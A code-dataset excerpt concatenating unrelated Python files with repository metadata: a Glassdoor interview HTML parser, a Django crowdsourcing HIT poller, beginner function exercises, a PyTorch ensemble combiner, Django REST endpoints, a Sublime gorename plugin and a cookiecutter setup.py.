2020-07-01T13:26:12.000Z
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 2
|
2018-07-20T00:23:46.000Z
|
2018-10-16T20:37:34.000Z
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 2
|
2019-03-15T13:43:36.000Z
|
2020-04-27T00:15:53.000Z
|
import GlassdoorScrapeCore.GlassdoorScrapeUtilities as Ut
def decode_experience(html_string):
if html_string.find("Positive", 0) != -1:
return "Positive Experience"
elif html_string.find("Neutral", 0) != -1:
return "Neutral Experience"
elif html_string.find("Negative", 0) != -1:
return "Negative Experience"
return ""
def decode_offer(html_string):
if html_string.find("Accepted", 0) != -1:
return "Accepted Offer"
elif html_string.find("Declined", 0) != -1:
return "Declined Offer"
elif html_string.find("No Offer", 0) != -1:
return "No Offer"
return ""
def decode_difficulty(html_string):
if html_string.find("Hard", 0) != -1:
return "Hard"
elif html_string.find("Average", 0) != -1:
return "Average"
elif html_string.find("Easy", 0) != -1:
return "Easy"
elif html_string.find("Difficult", 0) != -1:
return "Difficult"
return ""
def decode_getting_interview(html_string):
html_string = html_string.upper()
if html_string.find(" ONLINE ", 0) != -1:
return "Online"
elif html_string.find("EMPLOY", 0) != -1:
return "Employee Referral"
elif html_string.find("RECRUITING", 0) != -1:
return "Campus Recruiting"
elif html_string.find("CAMPUS", 0) != -1:
return "Campus Recruiting"
return ""
def parse_html(html_string):
company_name = Ut.get_string_between(html_string, "</script><title>", "Interview Questions |", "")
print("Company Name: " + company_name)
interview_list = Ut.get_list_of_substrings(html_string, "<li class=' empReview cf ' id='InterviewReview", "</li>")
if len(interview_list) == 0:
interview_list = Ut.get_list_of_substrings(html_string,
"<li class=' lockedReview empReview cf ' id='InterviewReview_",
"</li>")
print("Interviews to parse: " + str(len(interview_list)))
# Each will have a list appended
output_listing = []
for main_list in range(0, len(interview_list)):
row = interview_list[main_list]
# Parse the current listing
row_list = []
# Company Name
_str = company_name
row_list.append(_str)
# Interview Date
_str = Ut.get_string_between(row, "datetime=\"", "\">", "")
row_list.append(_str)
# Title (Analyst Interview)
_str = Ut.get_string_between(row, "<span class='reviewer'>", "</span>", "")
_str = _str.strip()
row_list.append(_str)
# Experience
experience = Ut.get_string_between(row, "<div class='flex-grid'>",
"<p class=\"strong margTopMd tightBot\">Application</p>", "")
experience = experience.strip()
if len(experience) == 0:
experience = Ut.get_string_between(row, "<div class='flex-grid'>",
"<p class=\"strong margTopMd tightBot\">Interview</p>", "")
_str = decode_experience(experience)
row_list.append(_str)
# Offer
_str = decode_offer(experience)
row_list.append(_str)
# Difficulty
_str = decode_difficulty(experience)
row_list.append(_str)
# GettingInterview
_Application = Ut.get_string_between(row,
"<p class='applicationDetails mainText truncateThis wrapToggleStr '>",
"</p>", "")
_current = decode_getting_interview(_Application)
row_list.append(_current)
# Application
row_list.append(_Application)
# Interview (description/verbatim)
_str = Ut.get_string_between(row,
"<p class='interviewDetails mainText truncateThis wrapToggleStr '>",
"</p>", "")
row_list.append(_str)
# Interview (Questions)
_str = Ut.get_string_between(row,
"<span class='interviewQuestion noPadVert truncateThis wrapToggleStr ' data-truncate-words='70'>",
"class", "", True)
row_list.append(_str)
# append the list
output_listing.append(row_list)
return output_listing
| 35.467742
| 135
| 0.571851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,274
| 0.289677
|
afd436ddbf34c2bee6a32af594d6e66622817288
| 8,626
|
py
|
Python
|
qurkexp/join/cron.py
|
marcua/qurk_experiments
|
453c207ff50e730aefb6e1118e0f93e33babdb0b
|
[
"BSD-3-Clause"
] | 1
|
2015-09-30T00:09:06.000Z
|
2015-09-30T00:09:06.000Z
|
qurkexp/join/cron.py
|
marcua/qurk_experiments
|
453c207ff50e730aefb6e1118e0f93e33babdb0b
|
[
"BSD-3-Clause"
] | null | null | null |
qurkexp/join/cron.py
|
marcua/qurk_experiments
|
453c207ff50e730aefb6e1118e0f93e33babdb0b
|
[
"BSD-3-Clause"
] | null | null | null |
import sys,os,base64,time,traceback
from datetime import datetime
ROOT = os.path.abspath('%s/../..' % os.path.abspath(os.path.dirname(__file__)))
sys.path.append(ROOT)
os.environ['DJANGO_SETTINGS_MODULE'] = 'qurkexp.settings'
SLEEP_TIME = 10
if __name__ == '__main__':
from django.conf import settings
from qurkexp.hitlayer.models import HitLayer, HIT
from qurkexp.join.models import *
hitlayer = HitLayer.get_instance()
def celeb_cb_generator(pid):
try:
pair = Pair.objects.get(pk=pid)
except:
return None
def f(hitid, allans):
for ans in allans:
resp = PairResp(pair=pair,
aid = ans['purk_aid'],
wid = ans['purk_wid'],
hid = hitid,
accept_time = ans['purk_atime'],
submit_time = ans['purk_stime'],
same = ans['same'] == 'yes')
resp.save()
if ans['same'] == 'yes':
pair.yes += 1
elif ans['same'] == 'no':
pair.no += 1
pair.save()
return f
def celeb_features_cb_generator(pk):
try:
fc = FeatureCeleb.objects.get(id=pk)
except Exception as e:
print e
print traceback.print_exc()
return None
def gen_feature_responses(fr, ans):
for k,v in ans.items():
parts = k.split("_")
if len(parts) == 2 and parts[0] == "feature":
feature = Feature.objects.get(pk = int(parts[1]))
val = FeatureVal.objects.get(pk = int(v))
fra = FeatureRespAns(fr=fr,feature=feature,val=val)
fra.save()
def f(hitid, allans):
for ans in allans:
fr = FeatureRespMeta(celeb=fc,
aid = ans['purk_aid'],
wid = ans['purk_wid'],
hid = hitid,
accept_time = ans['purk_atime'],
submit_time = ans['purk_stime'])
fr.save()
gen_feature_responses(fr, ans)
return f
def celeb_batchpair_cb_generator(bid):
try:
batch = BPBatch.objects.get(pk=bid)
except Exception as e:
print e
print traceback.print_exc()
return None
def gen_batchpair_responses(bprm, ans):
for k,v in ans.items():
parts = k.split("_")
if len(parts) == 3 and parts[0] == "radio":
left = int(parts[1])
right = int(parts[2])
pair = BPPair.objects.filter(bpbatch=bprm.batch).filter(left=left).get(right=right)
if v == "false":
same = False
elif v == "true":
same = True
else:
raise Exception("Incorrect radio value")
bpra = BPRespAns(bprm=bprm, pair=pair, same=same)
bpra.save()
#print "kv",k,v,same,bpra.same,bpra.id
#print len(bprm.bprespans_set.all()), bprm.bprespans_set.all()[0].id, bprm.bprespans_set.all()[1].id
def f(hitid, allans):
for ans in allans:
bprm = BPRespMeta(batch=batch,
aid = ans['purk_aid'],
wid = ans['purk_wid'],
hid = hitid,
accept_time = ans['purk_atime'],
submit_time = ans['purk_stime'])
bprm.save()
gen_batchpair_responses(bprm, ans)
return f
def sort_cb_generator(pk):
try:
cb = CompBatch.objects.get(id=pk)
except Exception as e:
print e
print traceback.print_exc()
return None
def gen_comp_responses(crm, ans):
sort_type = crm.batch.experiment.sort_type
if sort_type == "cmp":
for k,v in ans.items():
parts = k.split("_")
if len(parts) == 4 and parts[0] == "order":
v1 = CompVal.objects.get(pk=int(parts[2]))
v2 = CompVal.objects.get(pk=int(parts[3]))
cra = CompRespAns(crm=crm, v1=v1, v2=v2, comp=v)
cra.save()
elif sort_type == "rating":
for k,v in ans.items():
parts = k.split("_")
if len(parts) == 2 and parts[0] == "rate":
cv = CompVal.objects.get(pk=int(parts[1]))
rra = RateRespAns(crm=crm, val=cv, rating=int(v))
rra.save()
else:
raise Exception("Unknown sort type")
def f(hitid, allans):
for ans in allans:
crm = CompRespMeta(batch=cb,
aid = ans['purk_aid'],
wid = ans['purk_wid'],
hid = hitid,
accept_time = ans['purk_atime'],
submit_time = ans['purk_stime'])
crm.save()
gen_comp_responses(crm, ans)
return f
hitlayer.register_cb_generator('celeb', celeb_cb_generator)
hitlayer.register_cb_generator('celeb_feature', celeb_features_cb_generator)
hitlayer.register_cb_generator('celeb_batchpair', celeb_batchpair_cb_generator)
hitlayer.register_cb_generator('sort', sort_cb_generator)
while True:
HitLayer.get_instance().check_hits()
print "going to sleep for %d sec" % (SLEEP_TIME)
time.sleep(SLEEP_TIME)
exit()
cmds = [#'python movie_batchpairs.py 211 10 naive movie_all_naive_10_1 5',
#'python movie_batchpairs.py 211 5 naive movie_all_naive_5_1 5',
#'python movie_batchpairs.py 211 2 smart movie_all_smart_2_1 5',
#'python movie_batchpairs.py 211 3 smart movie_all_smart_3_1 5',
#'python movie_batchpairs.py 211 5 smart movie_all_smart_5_1 5',
#'python generate_comparisons.py animals rating 27 5 1 5 animals-dangerous-rating-27-5-1-5-2',
#'python movie_batchpairs.py 211 5 naive movie_all_naive_5_3 5',
#'python generate_batchpairs.py 30 10 naive ordered 30-10-naive-ordered-20 5',
#'python generate_batchpairs.py 30 5 naive ordered 30-5-naive-ordered-20 5',
#'python generate_batchpairs.py 30 3 naive ordered 30-3-naive-ordered-20 5',
#'python generate_comparisons.py squares cmp 40 1 10 5 squares-cmp-40-1-10-5-1'
# 'python generate_comparisons.py squares rating 50 5 1 5 squares-skew-rating-50-5-1-5-3',
# 'python generate_comparisons.py squares rating 50 5 1 5 squares-skew-rating-50-5-1-5-4',
# 'python generate_comparisons.py squares cmp 40 1 5 5 squares-skew-cmp-40-1-5-5-1'
#'python generate_comparisons.py squares rating 5 5 1 1 test_eugene_10',
]
def runcmds(cmds):
for cmd in cmds:
print cmd
os.system(cmd)
time.sleep(10)
while HIT.objects.filter(done=False).count() > 0:
HitLayer.get_instance().check_hits()
print "going to sleep for %d sec" % (SLEEP_TIME)
time.sleep(SLEEP_TIME)
def runcmd(cmd):
print cmd
os.system(cmd)
time.sleep(10)
while HIT.objects.filter(done=False).count() > 0:
HitLayer.get_instance().check_hits()
print "going to sleep for %d sec" % (SLEEP_TIME)
time.sleep(SLEEP_TIME)
while len(cmds) > 0:
cmd = cmds.pop(0)
runcmd(cmd)
exit()
cmds = []
for actorid in range(1, 5+1):
cmds.append('python movie_comparisons.py cmp movie_all_smart_3_1 %d 1 5 5 movie_cmp_%d_1_5_5_v3' % (actorid, actorid))
runcmds(cmds)
cmds = []
for actorid in range(1, 5+1):
cmds.append('python movie_comparisons.py rating movie_all_smart_3_1 %d 5 1 5 movie_rat_%d_5_1_5_v3' % (actorid, actorid))
runcmds(cmds)
| 40.308411
| 131
| 0.504405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,991
| 0.230814
|
afd5a7231c757b5d59c10582041a64bcee61c37a
| 4,155
|
py
|
Python
|
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | null | null | null |
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | null | null | null |
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | 1
|
2021-02-28T12:52:55.000Z
|
2021-02-28T12:52:55.000Z
|
# Day 12: Functions
# Exercises
# Define four functions: add, subtract, divide, and multiply. Each function should take two arguments, and they should print the result of the arithmetic operation indicated by the function name.
# When orders matters for an operation, the first argument should be treated as the left operand, and the second argument should be treated as the right operand.
# For example, if the user passes in 6 and 2 to subtract, the result should be 4, not -4.
# You should also make sure that the user can’t pass in 0 as the second argument for divide. If the user provides 0, you should print a warning instead of calculating their division.
def add(firstvalue, secondvalue):
print(firstvalue + secondvalue)
def subtract(firstvalue, secondvalue):
print(firstvalue - secondvalue)
def divide(firstvalue, secondvalue):
if secondvalue == 0:
quit("You can't do that!")
print(firstvalue / secondvalue)
def multiply(firstvalue, secondvalue):
print(firstvalue * secondvalue)
# Main (input/menu)
firstvalue = int(input("Enter first value: "))
secondvalue = int(input("Enter second value: "))
userchoice = input("\nWhat operation do you wish to perform?\n1. Add\n2. Subtract\n3. Divide\n4. Multiply\nEnter choice: ")
if userchoice == "1":
add(firstvalue, secondvalue)
elif userchoice == "2":
subtract(firstvalue, secondvalue)
elif userchoice == "3":
divide(firstvalue, secondvalue)
elif userchoice == "4":
multiply(firstvalue, secondvalue)
else:
print("Invalid input, try again.")
# Define a function called print_show_info that has a single parameter. The argument passed to it will be a dictionary with some information about a T.V. show. For example:
# The print_show_info function should print the information stored in the dictionary, in a nice way. For example:
# Breaking Bad (2008) - 5 seasons - Remember you must define your function before calling it!
tv_show = {
"title": "Breaking Bad",
"seasons": 5,
"initial_release": 2008
}
def print_show_info(show):
print(f"{show['title']} ({show['initial_release']}) - {show['seasons']} seasons")
print_show_info(tv_show)
# Below you’ll find a list containing details about multiple TV series.
series = [
{"title": "Breaking Bad", "seasons": 5, "initial_release": 2008},
{"title": "Fargo", "seasons": 4, "initial_release": 2014},
{"title": "Firefly", "seasons": 1, "initial_release": 2002},
{"title": "Rick and Morty", "seasons": 4, "initial_release": 2013},
{"title": "True Detective", "seasons": 3, "initial_release": 2014},
{"title": "Westworld", "seasons": 3, "initial_release": 2016},
]
# Use your function, print_show_info, and a for loop, to iterate over the series list, and call your function once for each iteration, passing in each dictionary.
# You should end up with each series printed in the appropriate format.
for show in series:
print_show_info(show)
# Create a function to test if a word is a palindrome. A palindrome is a string of characters that are identical whether read forwards or backwards. For example, “was it a car or a cat I saw” is a palindrome.
# In the day 7 project, we saw a number of ways to reverse a sequence, and you can use this to verify whether a string is the same backwards as it is in its original order. You can also use a slicing approach.
# Once you’ve found whether or not a word is a palindrome, you should print the result to the user. Make sure to clean up the argument provided to the function. We should be stripping whitespace from both
# ends of the string, and we should convert it all to the same case, just in case we’re dealing with a name, like “Hannah”.
# Vars needed
userword = None
reverseword = None
def palindrome_check():
userword = list(input("Enter the word you want to check: ").strip().lower())
reverseword = userword[0:]
reverseword.reverse()
if reverseword == userword:
print("That is indeed a palindrome.")
elif reverseword is not userword:
print("That is not a palindrome.")
else:
print("Something went terribly wrong, contact script author.")
palindrome_check()
| 43.736842
| 210
| 0.726113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,880
| 0.690482
|
bb5df3fbda301f153649b52b26d0e9ba6ce8747f
| 24
|
py
|
Python
|
ckan_cloud_operator/providers/db/constants.py
|
MuhammadIsmailShahzad/ckan-cloud-operator
|
35a4ca88c4908d81d1040a21fca8904e77c4cded
|
[
"MIT"
] | 14
|
2019-11-18T12:01:03.000Z
|
2021-09-15T15:29:50.000Z
|
ckan_cloud_operator/providers/db/constants.py
|
MuhammadIsmailShahzad/ckan-cloud-operator
|
35a4ca88c4908d81d1040a21fca8904e77c4cded
|
[
"MIT"
] | 52
|
2019-09-09T14:22:41.000Z
|
2021-09-29T08:29:24.000Z
|
ckan_cloud_operator/providers/db/constants.py
|
MuhammadIsmailShahzad/ckan-cloud-operator
|
35a4ca88c4908d81d1040a21fca8904e77c4cded
|
[
"MIT"
] | 8
|
2019-10-05T12:46:25.000Z
|
2021-09-15T15:13:05.000Z
|
PROVIDER_SUBMODULE='db'
| 12
| 23
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4
| 0.166667
|
bb5dfba5c5533938d6a17b1b05c8c187bd4dad1b
| 3,450
|
py
|
Python
|
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
"""
Contains the trainable sub-network of an ensemble classifier.
Handles calling the training and evaluation.
"""
import torch
import torch.nn as nn
import torch.optim as optim
from matplotlib.pyplot import show
from utility.fusion_functions import (train_nn_combiner_model,
test_nn_combiner)
from definitions import (MODELS_TRAIN_OUTPUTS_FILE, MODELS_VAL_OUTPUTS_FILE,
MODELS_TEST_OUTPUTS_FILE,
BEST_COMBINER_MODEL)
from utility.utilities import FusionData, Features
class CombinerModel(nn.Module):
def __init__(self):
super(CombinerModel, self).__init__()
self.input_dim = 40 # Label count * base model count
self.model = nn.Sequential(
nn.Linear(self.input_dim, 32),
nn.BatchNorm1d(32),
nn.ReLU(),
nn.Linear(32, 10)
)
def forward(self, x):
x = x.flatten(start_dim=1)
x = self.model(x)
return x
if __name__ == '__main__':
run_train = True
run_test = True
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
print(device)
model_ensemble = CombinerModel()
if run_train:
optimizer = optim.Adam(model_ensemble.parameters(), lr=0.000020)
epochs = 100
batch_size = 32
feature_train = Features(feature_file=MODELS_TRAIN_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_train = FusionData(features=[feature_train], do_reshape=False)
feature_val = Features(feature_file=MODELS_VAL_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_val = FusionData(features=[feature_val], do_reshape=False)
train_nn_combiner_model(model=model_ensemble,
optimizer=optimizer,
train_data=data_train.get_data(),
val_data=data_val.get_data(),
best_model=BEST_COMBINER_MODEL,
device=device,
epochs=epochs,
batch_size=batch_size)
if run_test:
feature_test = Features(feature_file=MODELS_TEST_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_test = FusionData(features=[feature_test], do_reshape=False)
model_ensemble.load_state_dict(torch.load(BEST_COMBINER_MODEL))
model_ensemble.eval()
test_nn_combiner(model=model_ensemble,
test_data=data_test.get_data(),
device=device,
verbose=True)
show()
"""
with logits, lr=0.000015, test: 0.872 (epoch 87) batchnormed, 0.871 without
with probabilities, lr=0.000025, test: 0.872 (epoch 46) batchnormed, 0.849 without
with softmax of probabilities, lr=0.000025 test: 0.872 (epoch 46) batchnormed, 0.814 without higher lr
with softmax of logits, lr=0.000020, 0.865, (epoch 46) batchnormed,
with logits:
test: 0.872 val: 0.892 val_loss: 0.2937 avg: 86.61% test_loss: 0.3840
optimizer = optim.Adam(model_ensemble.parameters(), lr=0.000015)
epochs = 92 # (87), 0.871 without batchnorm
batch_size = 32
self.model = nn.Sequential(
nn.Linear(self.input_dim, 32),
nn.BatchNorm1d(32),
nn.ReLU(),
#nn.Dropout(0.5),
nn.Linear(32, 10)
)
"""
| 35.9375
| 102
| 0.595072
| 446
| 0.129275
| 0
| 0
| 0
| 0
| 0
| 0
| 942
| 0.273043
|
bb5e3228f03e7078fb5aaf1eab536edafbe9b383
| 1,639
|
py
|
Python
|
gotools_rename.py
|
liuhewei/gotools-sublime
|
2c44f84024f9fd27ca5c347cab080b80397a32c2
|
[
"MIT"
] | 60
|
2016-04-06T15:28:11.000Z
|
2021-01-26T13:08:19.000Z
|
gotools_rename.py
|
liuhewei/gotools-sublime
|
2c44f84024f9fd27ca5c347cab080b80397a32c2
|
[
"MIT"
] | 19
|
2016-04-07T02:28:22.000Z
|
2019-05-16T14:32:14.000Z
|
gotools_rename.py
|
liuhewei/gotools-sublime
|
2c44f84024f9fd27ca5c347cab080b80397a32c2
|
[
"MIT"
] | 18
|
2016-04-19T18:23:49.000Z
|
2021-08-31T14:32:03.000Z
|
import sublime
import sublime_plugin
import os
from .gotools_util import Buffers
from .gotools_util import GoBuffers
from .gotools_util import Logger
from .gotools_util import ToolRunner
class GotoolsRenameCommand(sublime_plugin.TextCommand):
def is_enabled(self):
return GoBuffers.is_go_source(self.view)
def run(self, edit):
initial_text = self.view.substr(self.view.word(self.view.sel()[0].begin()))
self.view.window().show_input_panel("Go rename:", initial_text, self.do_rename, None, None)
def do_rename(self, name):
filename, _row, _col, offset, _offset_end = Buffers.location_at_cursor(self.view)
args = [
"-offset", "{file}:#{offset}".format(file=filename, offset=offset),
"-to", name,
"-v"
]
output, err, exit = ToolRunner.run(self.view, "gorename", args, timeout=15)
if exit != 0:
print("GoTools: Gorename error:\n%s" % err)
Logger.status("rename failed ({0}): {1}".format(exit, err))
return
Logger.status("renamed symbol to {name}".format(name=name))
panel = self.view.window().create_output_panel('gotools_rename')
panel.set_scratch(True)
# TODO: gorename isn't emitting line numbers, so to get clickable
# referenced we'd need to process each line to append ':N' to make the
# sublime regex work properly (line number is a required capture group).
panel.settings().set("result_file_regex", "^\t(.*\.go)$")
panel.run_command("select_all")
panel.run_command("right_delete")
panel.run_command('append', {'characters': err})
self.view.window().run_command("show_panel", {"panel": "output.gotools_rename"})
| 38.116279
| 95
| 0.698597
| 1,449
| 0.884076
| 0
| 0
| 0
| 0
| 0
| 0
| 484
| 0.295302
|
bb5ffa2d4cc2b708f22acabc46b7a17e37cfa7ad
| 765
|
py
|
Python
|
backend/equipment/endpoints.py
|
Vini1979/Engenharia_Software_IF977
|
dee99b7a05736bd35935d30a88b61a1f273d7633
|
[
"MIT"
] | null | null | null |
backend/equipment/endpoints.py
|
Vini1979/Engenharia_Software_IF977
|
dee99b7a05736bd35935d30a88b61a1f273d7633
|
[
"MIT"
] | 1
|
2021-04-14T18:52:27.000Z
|
2021-04-14T18:52:27.000Z
|
backend/equipment/endpoints.py
|
Vini1979/Engenharia_Software_IF977
|
dee99b7a05736bd35935d30a88b61a1f273d7633
|
[
"MIT"
] | 1
|
2021-04-27T18:15:13.000Z
|
2021-04-27T18:15:13.000Z
|
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
from equipment.serializers import EquipmentSerializer, ItemSerializer
from equipment.models import Item, Equipment
class ListCreateItemEndpoint(ListCreateAPIView):
serializer_class = ItemSerializer
queryset = Item.objects.all()
class RetrieveUpdateDestroyItemEndpoint(RetrieveUpdateDestroyAPIView):
serializer_class = ItemSerializer
queryset = Item.objects.all()
class ListCreateEquipmentEndpoint(ListCreateAPIView):
serializer_class = EquipmentSerializer
queryset = Equipment.objects.all()
class RetrieveUpdateDestroyEquipmentEndpoint(RetrieveUpdateDestroyAPIView):
serializer_class = EquipmentSerializer
queryset = Equipment.objects.all()
| 31.875
| 83
| 0.831373
| 554
| 0.724183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
bb601bdac4b627b652ca2cc549c648ed9d7b4ddf
| 1,286
|
py
|
Python
|
{{cookiecutter.project_slug}}/setup.py
|
mathemaphysics/cookiecutter-cpp-devcontainer
|
d9a8e23e165e3698b4a1cb4516a397450355466a
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/setup.py
|
mathemaphysics/cookiecutter-cpp-devcontainer
|
d9a8e23e165e3698b4a1cb4516a397450355466a
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/setup.py
|
mathemaphysics/cookiecutter-cpp-devcontainer
|
d9a8e23e165e3698b4a1cb4516a397450355466a
|
[
"MIT"
] | null | null | null |
{%- set modname = cookiecutter.project_slug.replace('-', '') -%}
from skbuild import setup
{%- if cookiecutter.use_submodules == "No" %}
import os
import pybind11
{%- endif %}
setup(
name='{{ modname }}',
version='0.0.1',
author='{{ cookiecutter.full_name }}',
author_email='your@email.com',
description='Add description here',
long_description='',
classifiers=[
"Programming Language :: Python :: 3",
"Operating System :: OS Independent",
{%- if cookiecutter.license == "MIT" %}
"License :: OSI Approved :: MIT License",
{%- elif cookiecutter.license == "BSD-2" %}
"License :: OSI Approved :: BSD License",
{%- elif cookiecutter.license == "GPL-3.0" %}
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
{%- elif cookiecutter.license == "LGPL-3.0" %}
"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)",
{%- endif %}
],
zip_safe=False,
packages=["{{ modname }}"],
cmake_args=[
"-DBUILD_TESTING=OFF",
"-DBUILD_DOCS=OFF",
{%- if cookiecutter.use_submodules == "No" %}
f"-DCMAKE_PREFIX_PATH={os.path.dirname(pybind11.__file__)}",
{%- endif %}
],
package_dir={"": "python"},
cmake_install_dir="python/{{ modname }}",
)
| 31.365854
| 83
| 0.604977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 574
| 0.446345
|
bb612a43c5e00fdec79d5ed2d464c2583287acfd
| 603
|
py
|
Python
|
lang/modules/os.py
|
pranavbaburaj/sh
|
dc0da9e10e7935310ae40d350c1897fcd65bce8f
|
[
"MIT"
] | 4
|
2021-01-30T12:25:21.000Z
|
2022-03-13T07:23:19.000Z
|
lang/modules/os.py
|
pranavbaburaj/sh
|
dc0da9e10e7935310ae40d350c1897fcd65bce8f
|
[
"MIT"
] | 3
|
2021-02-26T13:11:17.000Z
|
2021-06-04T17:26:05.000Z
|
lang/modules/os.py
|
pranavbaburaj/sh
|
dc0da9e10e7935310ae40d350c1897fcd65bce8f
|
[
"MIT"
] | 1
|
2021-02-08T10:18:29.000Z
|
2021-02-08T10:18:29.000Z
|
import os, platform
from clint.textui import colored as color
class OperatingSystem():
@staticmethod
def os_name():
return platform.system()
@staticmethod
def user_name():
return platform.uname().node
@staticmethod
def path():
return os.getcwd()
def list_directories(directory):
dir_list = os.listdir(directory)
for index, p in enumerate(dir_list):
path = os.path.join(directory, p)
if os.path.isfile(path):
print(color.green(str(p)))
else:
print(color.blue(str(p)))
| 22.333333
| 42
| 0.593698
| 244
| 0.404643
| 0
| 0
| 198
| 0.328358
| 0
| 0
| 0
| 0
|
bb63df222835f6eb78ba3c732e704619ca12b613
| 899
|
py
|
Python
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 241
|
2021-07-20T08:35:20.000Z
|
2022-03-31T02:39:08.000Z
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 49
|
2021-07-22T23:18:42.000Z
|
2022-03-24T09:15:26.000Z
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 71
|
2021-07-21T05:17:52.000Z
|
2022-03-29T23:49:28.000Z
|
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
def f_gold ( str ) :
n = len ( str )
for i in range ( n ) :
if ( str [ i ] != 'a' ) :
break
if ( i * 2 != n ) :
return False
for j in range ( i , n ) :
if ( str [ j ] != 'b' ) :
return False
return True
#TOFILL
if __name__ == '__main__':
param = [
('ba',),
('aabb',),
('abab',),
('aaabb',),
('aabbb',),
('abaabbaa',),
('abaababb',),
('bbaa',),
('11001000',),
('ZWXv te',)
]
n_success = 0
for i, parameters_set in enumerate(param):
if f_filled(*parameters_set) == f_gold(*parameters_set):
n_success+=1
print("#Results: %i, %i" % (n_success, len(param)))
| 23.051282
| 64
| 0.506118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 302
| 0.335929
|
bb64614546d6d512164770fa3b04fc627d4d3bf2
| 218
|
py
|
Python
|
api/urls.py
|
kaito1002/django-rest-init
|
8ece6311ea84c46e74a0ac0b7f42983f40a72c34
|
[
"MIT"
] | null | null | null |
api/urls.py
|
kaito1002/django-rest-init
|
8ece6311ea84c46e74a0ac0b7f42983f40a72c34
|
[
"MIT"
] | null | null | null |
api/urls.py
|
kaito1002/django-rest-init
|
8ece6311ea84c46e74a0ac0b7f42983f40a72c34
|
[
"MIT"
] | null | null | null |
from rest_framework import routers
from user.views import UserViewSet
from .views import SampleViewSet
router = routers.DefaultRouter()
router.register('users', UserViewSet)
router.register('samples', SampleViewSet)
| 24.222222
| 41
| 0.821101
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.073394
|
bb66ace576783c81b7f71f58e215ed9554b532e3
| 1,249
|
py
|
Python
|
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
# Copyright 2022 iiPython
# Modules
import time
# Initialization
embed_size = 45
# Plugin class
class EmbedPlugins(object):
def __init__(self, eventmgr) -> None:
self.meta = {
"name": "Embeds",
"author": "iiPython",
"id": "embeds"
}
self.eventmgr = eventmgr
def center(self, line: str) -> str:
padding = round((embed_size - len(line)) / 2)
return (" " * padding) + line + (" " * padding)
def normalize(self, lines: str, tags: str) -> str:
new, longest = [], len(max(lines, key = len))
for line in lines:
new.append(f"{tags}" + line + (" " * (longest - len(line))))
return new
def on_call(self, args: list) -> str:
try:
title, body = args[0], args[1]
except IndexError:
return self.print("usage: /embeds <title> <body>")
# Make footer
footer = time.strftime("%I:%M %p · %Z")
# Construct embed
embed_lines = [self.center(line) for line in [title] + [body[i:i + (embed_size - 10)] for i in range(0, len(body), embed_size - 10)] + ["", footer]]
return "\n".join(self.normalize(embed_lines, args[2] if len(args) > 2 else "[bglblack]"))
| 29.046512
| 156
| 0.542834
| 1,150
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 221
| 0.1768
|
bb66fc7050d575d46b09f705e4a0c71d8c66cda1
| 11,303
|
py
|
Python
|
inn.py
|
NLipatov/INNer
|
88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
inn.py
|
NLipatov/INNer
|
